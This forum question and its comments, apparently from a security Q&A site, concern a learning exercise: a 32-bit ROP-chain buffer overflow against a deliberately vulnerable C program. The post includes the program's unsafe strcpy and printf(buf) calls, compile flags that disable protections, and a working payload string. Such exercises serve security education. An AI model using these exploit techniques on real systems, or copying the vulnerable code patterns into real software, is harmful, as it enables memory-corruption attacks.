# Buffer Overflow with ROP Chain Output Problem

Tags: exploit, buffer-overflow, c, stack-overflow, rop

I have the following problem: I have this C program and I have done buffer overflow using ROP gadgets. I have a problem with the output.

I want to stop the `printf()` call in the  vuln function to get the right output but how can I achieve that with the ROP chain?

My program is compiled with `gcc`.

Compilation:

```
gcc -m32 -fno-stack-protector -no-pie -o  rop rop.c
```

Payload:

```
    Overflow + secret adress  +  secret adress +the adress of  pop ebx ; ret +
 the right Parameter for the secret Function + just_another_secret_function adress 
    + the adress  of pop edi ; pop ebp ; ret+ the right  Parameter for  just_another_secrect_function + exit adress
```

The Input:

```
./rop "$(python2 -c 'print "A"*112 + "\xd6\x91\x04\x08"+ "\xd6\x91\x04\x08" + "\x53\x93\x04\x08" + "\x41\x46\x46\x45" + "\x24\x92\x04\x08" + "\x52\x93\x04\x08" + "\x01" + "\xde\x92\x04\x08"')"
```

SourceCode:

```
#include <stdio.h>
#include <string.h>

void secret(int magic)
{
        if(magic == 0x45464641) printf("Right!\n");
        else printf("Wrong!\n");
}

void just_another_secret_function(unsigned char one)
{
        if(one == 1) printf("Well done!\n");
}

void vuln (char *s)
{
        char buf[100];
        strcpy(buf, s);
        printf(buf);
}

int main (int argc, char **argv)
{
        if(argc>1) vuln(argv[1]);
        return 0;
}
```

The output should be like this:

```
Wrong!
Right!
Well done!
```

and I am getting this output:

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAFFE$RWrong!
Right!
Well done!
```

Comment: Are you sure about this? You're overflowing `buf` which is a local var to `vuln()` and you won't be able to pivot until `vuln()` *returns* which is when the epilog pops your controlled data of the stack into RIP. This occurs **after** the `printf()` call. Format string might be what you're looking for..... (Otherwise you can cheat by using \r at the start of your payload (depending on your shell))

Comment: @wireghoul i was trying to achieve that with rop but , is there another way to get the right output , i have tried to remove the printf() from the source code and it worked verywell but the point is i have to get the  right output with the rop chain and i am not achieving that it's kinda  frustrating .

Comment: Perhaps read my comment again?